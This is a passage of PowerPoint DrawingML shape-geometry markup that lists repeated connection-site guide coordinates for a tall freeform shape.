              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 255587 w 1342244"/>
